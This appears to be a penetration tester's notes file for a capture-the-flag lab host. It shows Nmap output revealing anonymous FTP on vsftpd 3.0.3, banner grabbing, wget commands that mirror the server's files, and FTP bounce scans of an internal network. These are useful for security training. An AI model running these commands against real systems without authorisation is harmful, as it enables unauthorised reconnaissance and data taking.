
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-11 11:15 CET
Nmap scan report for 10.129.164.4
Host is up (0.028s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/11%OT=21%CT=1%CU=38776%PV=Y%DS=2%DC=T%G=Y%TM=6395AD
OS:E6%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1
OS:1NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   22.24 ms 10.10.14.1
2   22.90 ms 10.129.164.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds



===========================================================================
AVAILABLE SCRIPT
===========================================================================

ls /usr/share/nmap/scripts | egrep "ftp"
ftp-anon.nse
ftp-bounce.nse
ftp-brute.nse
ftp-libopie.nse
ftp-proftpd-backdoor.nse
ftp-syst.nse
ftp-vsftpd-backdoor.nse
ftp-vuln-cve2010-4221.nse
tftp-enum.nse


===========================================================================
BANNER GRABBER
===========================================================================
nc -vn 10.129.164.4 21

Connection to 10.129.164.4 21 port [tcp/*] succeeded!
220 (vsFTPd 3.0.3)

openssl s_client -connect 10.129.164.4:21 -starttls ftp #Get certificate if any

CONNECTED(00000003)
40A716B98A7F0000:error:0A00010B:SSL routines:ssl3_get_record:wrong version number:ssl/record/ssl3_record.c:354:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 63 bytes and written 307 bytes
Verification: OK
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 0 (ok)
---

===========================================================================
DOWNLOAD ALL FILES FROM FTP
===========================================================================

wget -m ftp://anonymous:anonymous@10.129.164.4 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.129.164.4 #Download all


===========================================================================
FTP BOUNCE ATTACK => (nmap Lateral Movement)
===========================================================================

nmap -b anonymous:anonymous@10.129.164.4 10.129.164.4
nmap -Pn -v -p 21,80 -b ftp:ftp@10.129.164.4 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.129.164.4 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443

